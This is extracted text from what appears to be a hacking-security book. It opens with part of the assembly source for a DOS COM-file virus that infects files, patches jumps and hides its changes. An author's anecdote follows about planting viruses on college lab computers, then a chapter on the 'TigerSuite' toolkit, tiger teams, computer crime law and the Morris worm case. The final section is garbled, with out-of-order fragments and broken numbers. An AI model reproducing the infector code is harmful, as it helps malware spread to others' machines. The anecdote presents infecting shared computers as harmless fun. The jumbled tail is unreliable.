651 save_jmp_displacement: sub ax, 3 ; file size - 3 = jmp disp. mov [bp + jmp_disp], ax write_code: mov ah, 40h mov cx, virus_length ;*** equate lea dx, [bp + start] int 21h goto_bof: mov ax, 4200h xor cx, cx xor dx, dx int 21h write_jmp: ; to file mov ah, 40h mov cx, 3 lea dx, [bp + jmp_code] int 21h inc [bp + infections] restore_date_time: mov ax, 5701h mov cx, [bp + dta_file_time] mov dx, [bp + dta_file_date] int 21h close_file: mov ah, 3eh int 21h restore_attrib: xor ch, ch mov cl, [bp + dta_file_attrib] ; restore original attri butes mov ax, 4301h lea dx, [bp + dta_file_name] int 21h done_infecting?: mov ah, [bp + infections] cmp ah, [bp + max_infections] jz bomb jmp find_next bomb: ; cmp bp, 0 ; je restore_path ; original run 652 ; ; Stuff deleted restore_path: mov ah, 3bh ; when path stored lea dx, [bp + root] ; '\' not included int 21h mov ah, 3bh ; cd to original pa th lea dx, [bp + org_path] int 21h restore_dta: mov ah, 1ah mov dx, [bp + old_dta_off] int 21h restore_3_bytes: ; in memory lea si, [bp + _3_bytes] mov di, 100h cld ; auto-inc si, di mov cx, 3 rep movsb return_control_or_exit?: cmp bp, 0 ; bp = 0 if original run je exit mov di, 100h ; return control back to prog jmp di ; -> cs:100h exit: mov ax, 4c00h int 21h ; Variable Declarations old_dta_off dw 0 ; offset of old dta ad dress ; dta record dta_filler db 21 dup (0) dta_file_attrib db 0 dta_file_time dw 0 dta_file_date dw 0 dta_file_size dd 0 dta_file_name db 13 dup (0) ; search_mask db '*.COM',0 ; files to infect: *.C OM search_attrib dw 00100111b ; all files a,s,h,r com_com db 'COMMAND.COM' 653 previous_dir db ' ',0 root db '\',0 org_path db 64 dup (0) ; original path infections db 0 ; counter max_infections db 1 _3_bytes db 0, 0, 0 jmp_code db 0E9h jmp_disp dw 0 last_chars db 0, 0 ; do last chars = ID ? virus_id db 'AZ' eov: ; end of virus virus_length equ offset eov - offset start end start Eventually, I accumulated 2.4 GB worth of hacker secrets, and had amassed the source for more than 2,000 well-known (as well as some lesser known) nasty infectors of every derivative (approximately 2 MB of the 2.4 GB). Looking back, I believe the rush of being part of a “secret society,” coupled with a youthful ego, caused me to forgo my principles for a while, and I began to play hacker while in college. The computer center was where students did research, typed their papers, and hung out between classes.Typically, there was a waiting list for the workstations. I would habitually take note of the expressions on my fellow students’ faces as they glared at the computer screens—primarily, they looked bored. And that’s what inspired my first attack. As an elective for a computer science degree, I had chosen an advanced programming class, which met three days a week, two of which were held at the computer center. My plan was simple—and harmless—and motivated by generating some excitement. Because programming was my forte, it didn’t take me long to complete the programs required to finish the class requirements, and I had plenty of time to help others and to plant my custom-made virus. Upon entering the center, each student had to produce an ID card, and sign in for a particular workstation. Therefore, I couldn’t infect my system or those next to me, so I transferred the hack attack from floppy to stations where students had trouble getting through the exercises. The attacks were simple: Upon x system reboots (all counted in hidden files), the system would execute my virus, typically masquerading as a system file. The effects generally consisted of loud sounds, fake screen “melts,” and graphical displays. And I always left my signature: Mr. Virus. It wasn’t long before the college paper began to publicize the attacks. And though the students had started looking forward to the next random attack, the administrators were frustrated, and did not have an inkling of how someone could continually circumvent the heavily monitored and supposedly secured center. I continued the attacks for eight weeks, each more imaginative than the last, and they became the topic of countless discussions. The technical staff at the center failed to find the hidden traps and instead had to rebuild each station. Eventually, I was turned in by another student who had overheard me talking to a member of the group I hung out with. Upon my “capture,’’ the administration informed me that ordinarily my exploits would have resulted in my expulsion; but because the students and staff had so enjoyed the 654 attacks, and because my professors came to my defense, I was allowed to complete my courses. Needless to say, I heeded the warning. I didn’t know then that the really whacked-out introduction to the “other” side of the Underground was yet to come. … to be continued in: Hack Attacks Denied. 655 CHAPTER 12 TigerSuite: The Complete Internetworking Security Toolbox The purpose of this chapter is to introduce a suite of tools that can be used to facilitate a security analysis—to examine, test, and secure personal computers and networks for and against security vulnerabilities. The goal here is take the mystery out of security and bring it directly to the consumer and/or technology professional, where it belongs. TigerSuite was developed to provide network security tools that are unique to the computer industry and sorely needed by individuals, commercial organizations, network professionals, and corporate managers concerned with maintaining a secure network. Such security includes protection against personal attacks, external attacks, and internal attempts at viewing or leveraging confidential company or private information against the “victim.” At the time of this writing, a complete suite of security products does not exist on the market; TigerSuite is the first to provide a complete suite of products in one package. Tiger Terminology But before launching into a discussion on the inner workings of the TigerSuite, some definitions are in order, some “tiger terminology,” if you will. We begin by identifying the role of a tiger team. Originally, a tiger team was a group of paid professionals whose purpose was to penetrate perimeter security, and test or analyze inner-security policies of corporations. These people hacked into the computer systems, phone systems, safes, and so on to help the companies that hired them to know how to revamp their security policies. More recently, a tiger team has come to refer to any official inspection or special operations team that is called in to evaluate a security problem. A subset of tiger teams comprises professional hackers and crackers who test the security of computer installations by attempting remote attacks via networks or supposedly secure communication channels. Tiger teams are also called in to test programming code integrity. Many software development companies outsource such teams to perform stringent dynamic code testing before putting software on the market. As the world becomes increasingly networked, corporate competitors and spies, disgruntled employees, and bored teenagers more frequently are invading company and organization computers to steal information, sabotage careers, or just to make trouble. Together, the Internet and the World Wide Web have opened wide a backdoor through which competitors and/or hackers can launch attacks on targeted computer networks. From my own experience, it seems approximately 85 percent of the networks wired to the Internet are vulnerable to such threats. With the growth of the Internet and continued advances in technology, these intrusions are becoming increasingly prevalent. In short, external threats are a real-world problem for any company with remote connectivity. For those reasons, hackers and tiger teams rely on what’s called a TigerBox to provide the necessary tools to reveal security weaknesses; such a box contains tools designed for sniffing, spoofing, cracking, scanning, and penetrating security vulnerabilities. It can be said that the TigerBox is the ultimate mechanism in search of the hack attack. The most important element of a TigerBox is the operating system foundation. A first-rate TigerBox is configured in a dual-boot setting that includes UNIX and Microsoft Windows operating systems. 656 Currently, TigerBox utility compilations for Microsoft’s OS are not as popular as those for its UNIX counterpart, but Windows is becoming more competitive in this regard. As you know by now, UNIX is a powerful operating system originally developed at AT&T Bell Laboratories for the scientific, engineering, and academic communities. By its nature, UNIX, is a multiuser, multitasking environment that is both flexible and portable, and that offers electronic mail, networking, programming, text-processing, and scientific capabilities. Over the years, two major forms (with numerous vendor variants of each) of UNIX have evolved: AT&T UNIX System V and the University of California at Berkeley’s Berkeley Software Distribution (BSD). But it is Linux, the trendy UNIX variant, that is commonly configured on a TigerBox. Linux offers direct control of the O/S command line, including custom code compilation for software stability and flexibility. In fact, most of the exploits in this book can be compiled with Linux. Currently, Linux is customized, packaged, and distributed by many vendors including: RedHat Linux (www.redhat.com), Slackware (www.slackware.org), Debian (www.debian.org), TurboLinux (www.turbolinux.com), Mandrake (www.linux- mandrake.com), SuSE (www.suse.com), Trinux (www.trinux.org), MkLinux (www.mklinux.org), LinuxPPC (www.linuxppc.org), SGI Linux (http://oss.sgi.com/projects /sgilinux11), Caldera OpenLin ux (www.caldera.com), Corel Linux (http://linux.corel.com), and Stampede Linux (www.stampede.org). A dual-boot configuration makes it easy to boot multiple operating systems on a single TigerBox. (Note, the Windows complement should be installed and configured prior to Linux.) At the time of this writing, the Windows versions that are most stable and competent include Windows 98 Second Edition and the Millennium Edition (the Windows 2000 Edition was being tested as this book was going to press). The Linux flavor regarded as most flexible and supportive is RedHat Linux (www.redhat.com). And note that if multiboot, third-party products “rub the wrong way,” the RedHat installation program now offers the option of making a boot diskette (containing a copy of the installed kernel and all modules required to boot the system). The boot diskette can also be used to load a rescue diskette. Then, when it is time to execute Windows, simply reboot the system minus the boot diskette; or when using Linux, simply reboot with the boot disk, and presto, you will see: Red Hat Linux release 6.x Kernel on an i586 login: The inexperienced should use a prog ram such as BootMagic (www.powerquest.com/ products/index.html) by PowerQuest Corporation for hassle- free, multiple boot setup with a graphical interface. LEGAL RAMIFICATIONS OF USING A TIGERBOX To the best of my knowledge, the first United States statute that specifically prohibits hacking is the Federal Fraud and Computer Abuse Act of 1986, enacted to fill legislative gaps in previous statutes. Subsection (a) of this act makes it a felony to knowingly access a computer without authorization and to obtain information with the intent to injure the United States or to benefit a foreign nation. This subsection protects any information that has been determined, pursuant to an executive order or statute, to be vital to this nation’s national defense or foreign relations. In addition, the 1986 act prohibits unauthorized access of information contained in a financial record or consumer-reporting agency, provided a “federal interest computer’’ is involved. The first successful prosecution under the 1986 act wa s United States of America v. Robert Tappan Morris (#774, Docket 90-1336. United States Court of Appeals, Second 657 Circuit. Argued Dec. 4, 1990, Decided March 7, 1991.), which involved a typical hacking offense and its resultant damage. The defendant was charged and convicted under subsection (a), which makes it a felony to access intentionally any "federal interest" computer without authorization and alter, damage, destroy, or prevent the authorized use of information resulting in the loss of at least $1,000. In the fall of 1988, Morris was a first-year graduate student in Cornell University’s computer science Ph.D. program. Through undergraduate work at Harvard and in various jobs he had acquired significant computer experience and expertise. When Morris entered Cornell, he was given an account on the computer at the Computer Science Division. This account gave him explicit authorization to use computers at Cornell. Morris engaged in various discussions with fellow graduate students about the security of computer networks and his ability to penetrate them. In October 1988, Morris began work on a computer program, later known as the Internet "worm" or "virus." The goal of this program was to demonstrate the inadequacies of current security measures on computer networks by exploiting the security defects that Morris had discovered. The tactic he selected was the release of a worm into network computers. Morris designed the program to spread across a national network of computers after being inserted at one computer location connected to the network. Morris released the worm into Internet, a group of national networks that connected university, governmental, and military computers around the country. The network permited communication and transfer of information between computers on the network. Morris sought to program the Internet worm to spread widely without drawing attention to itself. The worm was supposed to occupy little computer operation time, and thus not interfere with normal use of the computers. Morris programmed the worm to make it difficult to detect and read, so that other programmers would not be able to "kill" the worm easily. Morris also wanted to ensure that the worm did not copy itself onto a computer that already had a copy. Multiple copies of the worm on a computer would make it easier to detect and would bog down the system and ultimately cause the computer to crash. Therefore, Morris designed the worm to "ask" each computer whether it already had a copy of the worm. If the computer responded "no," then the worm would copy itself onto the computer; if it responded "yes," the worm would not duplicate. However, Morris was concerned that other programmers could kill the worm by programming their own computers to falsely respond "yes" to the question. To circumvent this protection, Morris programmed the worm to duplicate itself every seventh time it received a "yes" response. As it turned out, Morris underestimated the number of times a computer would be asked the question, and his one-out-of-seven ratio resulted in far more copying than he had anticipated. The worm was also designed so that it would be killed when a computer was shut down, an event that typically occurs once every week or two. This should have prevented the worm from accumulating on one computer, had Morris correctly estimated the likely rate of reinfection. Morris identified four ways in which the worm could break into computers on the network: (1) through a "hole" or "bug" (an error) in SEND MAIL, a computer program that transferred and received electronic mail on a computer; (2) through a bug in the "finger demon" program, a program that permited a person to obtain limited information about the users of another computer; (3) through the "trusted 658 hosts" feature, which permited a user with certain privileges on one computer to have equivalent privileges on another computer without using a password; and (4) through a program of password guessing, whereby various combinations of letters are tried out in rapid sequence in the hope that one will be an authorized user’s password, which is entered to permit whatever level of activity that user is authorized to perform. On November 2, 1988, Morris released the worm from a computer at the Massachusetts Institute of Technology. MIT was selected to disguise the fact that the worm came from Morris at Cornell. Morris soon discovered that the worm was replicating and reinfecting machines at a much faster rate than he had anticipated. Ultimately, machines at locations around the country either crashed or became "catatonic." When Morris realized what was happening, he contacted a friend at Harvard to discuss a solution. Eventually, they sent an anonymous message from Harvard over the network, instructing programmers how to kill the worm and prevent reinfection. However, because the network route was clogged, the message did not get through until it was too late. Computers were affected at numerous installations, including leading universities, military sites, and medical research facilities. The estimated cost of dealing with the worm at each installation ranged from $200 to more than $53,000. Morris was found guilty, following a jury trial, of violating 18 U.S.C. Section 1030(a)(5)(A). He was sentenced to three years of probation, 400 hours of community service, a fine of $10,050, and the costs of his supervision. The success of this prosecution demonstrated that the United States judicial system can and will prosecute domestic computer crimes that are deemed to involve national interests. That said, the federal government to date has been reluctant to prosecute under the 1986 act, possibly because most state legislatures have adopted their own regulations, and Congress is hesitant before usurping state court jurisdiction over computer related crimes. Therefore it is a good idea to become familiar with local legislative directives as they pertain to discovery, hacking, and security analysis. Hardware requirements depend on the intended usage of the TigerBox. For example: Will the system be used for programming? Will the system serve as a gaming PC? Currently, the minimum requirements, to accommodate most scenarios, include the following: • Processor: Pentium 160+. • RAM: 64 MB. • HDD: 8 GB. • Video: Support for at least 1024 × 768 resolution at 16 K colors. • Network: Dual NICs, at least one of which supports passive or promiscuous mode. (When an interface is in promiscuous mode, you are explicitly asking to receive a copy of all packets, whether addressed to the TigerBox or not.) • Other: Three-button mouse, CD-ROM, and floppy disk drive. Introduction to TigerSuite Designed using proprietary coding and technologies, TigerSuite is a compilation of everything you need to conduct a professional security analysis; that is, hacking to discover, scan, penetrate, expose, control, spy, flood, spoof, sniff, infect, report, monitor, and more. In a 9/2000 benchmark comparison conducted by ValCom Engineers (www.pccval.com), between TigerSuite and other 659 popular commercial discovery/scan software, for a simple 1,000-port scan, Tiger Tools completed an average scan in less than one minute, compared to an average of 35 minutes with the same results found in both scans. Their overall viewpoint simply states, the design and developed product are awesome. Installation TigerSuite can be activated using one of two methods: local or mobile. The local method requires a simple installation from the CD-ROM. The mobile method involves a new technological feature that allows TigerSuite to be run directly from the CD. Utilizing portable library modularization techniques, the software is executed from the CD by running the main program file, TSmobile.EXE. This convenient feature permits the conventions of software without modifying a PC configuration and/or occupying essential hard disk space. Local Installation Method The TigerSuite local installation process takes only a few minutes. The Setup program (included on this book’s CD) automatically installs, configures, and initializes a valuation of the tool suite. Figure 12.1 TigerSuite welcome screen. The minimum system requirements for the local installation process are as follows: • Operating System: Windows NT Workstation 4.0, Windows NT Server 4.0, Windows NT Server 5.0, Windows 95, Windows 98, Millennium Edition, or Windows 2000 • Operating System Service Pack: Any • Processor: Pentium or better • Memory: 16 MB or more • Hard Drive Space: 10 MB free 660 • Network/Internet Connection: 10BASET, 100BASET, Token Ring, ATM, xDSL, ISDN, cable modem, or regular modem connection using the TCP/IP protocol The installation process can be described in six steps: 1. Run TSsetup.EXE. When running the Setup program, the application must first unpack the setup files and verify them. Once running, if Setup detects an existing version of TigerSuite, it will automatically overwrite older files with a newer upgrade. A welcome screen is displayed (see Figure 12.1). Figure 12.2 TigerSuite User Information screen. 2. Click Next to continue. 3. Review the Licensing Agreement. You must accept and agree to the terms and conditions of the licensing agreement, by clicking Yes, to complete the Setup process. Otherwise, click No to exit the Setup. The following is an extract from this policy: This software is sold for information purposes only, providing you with the internetworking knowledge and tools to perform professional security audits. Neither the developers nor distributors will be held accountable for the use or misuse of the information contained. This software and the accompanying files are sold "as is" and without warranties as to performance or merchantability or any other warranties whether expressed or implied. While we use reasonable efforts to include accurate and up-to-date information, it makes no representations as to the accuracy, timeliness, or completeness of that information, and you should not rely upon it. In using this software, you agree that its information and services are provided "as is, as available" without warranty, express or implied, and that you use this at your own risk. By accessing any portion of this software, you agree not to redistribute any of the information found therein. We shall not be liable for any damages or costs arising out of or in any way connected with your use of this software. You further agree that any developer or distributor of this software and any other [...]... modules are well designed to provide detailed penetration attacks that test strengths and weaknesses by locating security gaps These hacking procedures offer an in-depth assessment of potential security risks that may exist internally and externally The TigerBox Toolkit penetrators can be launched by clicking on the mini TS icon in the taskbar, then TigerBox Toolkit, and finally, Penetrators, as shown... vulnera- Figure 12.35 Resolving the target hostname Figure 12.36 Performing a Site Query Scan 685 bility attacks discussed in Chapter 9? These exploits can be practical assessments for potential Web page hacking Let’s continue with target IP address and port scans Assuming a Class C network block, we’ll use the TigerSuite TigerBox Toolkit/ Scanners/IP Range Scan to verify our active addresses and possibly... equipment that encounters these packets, such as routers, strip off and examine the headers that contain the sensitive routing information These headers are then modified and reformulated as a packet to be passed along IP datagrams are the primary information units in the Internet The IP’s responsibilities also include the fragmentation and reassembly of datagrams to support 666 links with different transmission... message packets, reporting errors, and other pertinent information back to the sending station, or source Hosts and infrastructure equipment use the ICMP to communicate control and error information, as they pertain to IP packet processing ICMP message encapsulation is a twofold process: Messages are encapsulated in IP datagrams, which are encapsulated in frames, as they travel across the Internet Basically,... Underground gateway AstaLaVista (www.astalavista.com), shown in Figure 12.34 AstaLaVista is renowned as one of the official Underground site- listing spiders But using these search engines, we do not come across any relevant information pertaining to our target research 683 Figure 12.34 Searching the Underground Step 2: Discovery The next step in our sample analysis is the discovery phase Based on the valuable... ascertain the position of a firewall or filtering device WhoIs Query (Figure 12.22) This module is a target discovery Whois that acts as a tool for looking up records in the NSI Registrar database Each record within the NSI Registrar database has a unique identifier assigned to it: a name, a record type, and various other fields To use Whois for a domain search, simply type in the domain you are looking... trails, and much more The Script field, on the other hand, allows for instant replies, hack script uploads, and more to the hacking station or TigerBox (see Figure 12.30) Sample Real-World Hacking Analysis Chapters 5 -9 described the techniques relevant to the first few phases of a security audit, through the discovery process of a target company, XYZ, Inc In this section we will re-create our findings with. .. Space and Volume Information modules Figure 12.11 Memory Stats, Power Stats and Processor Information modules • Memory Status, Power Status, and Processor Info (Figure 12.11) These modules provide crucial memory, power, and processor status before, during, and after a security analysis and/or penetration-testing sequence From the data gathered, an average baseline can be predicted in regard to how many... displays that information in a table The Internetworking modules are defined as follows: • IP Stats (Figure 12.13) This module gathers current statistics on interface IP routes, datagrams, fragments, reassembly, and header errors Remember, IP is a protocol designed to interconnect networks to form an Internet to pass data back and forth It contains addressing and control information that enable packets... 12.37) With these findings, a hacker would consider our target administrator to be a “lamer,” basically an ignorant or inexperienced IS technician—whose job may be in jeopardy if these potentially vulnerable nodes contain security breaches More important, we’ll carefully note the following: Host Address IP DNS Resolution 206.0.1 39. 8 mtopel.xyzinc.net 206.0.1 39. 89 kflippel.xyzinc.net Chances are that these . Messages are encapsulated in IP datagrams, which are encapsulated in frames, as they travel across the Internet. Basically, ICMP uses the same unreliable means of communications as a datagram against personal attacks, external attacks, and internal attempts at viewing or leveraging confidential company or private information against the “victim.” At the time of this writing, a complete. prohibits hacking is the Federal Fraud and Computer Abuse Act of 198 6, enacted to fill legislative gaps in previous statutes. Subsection (a) of this act makes it a felony to knowingly access a computer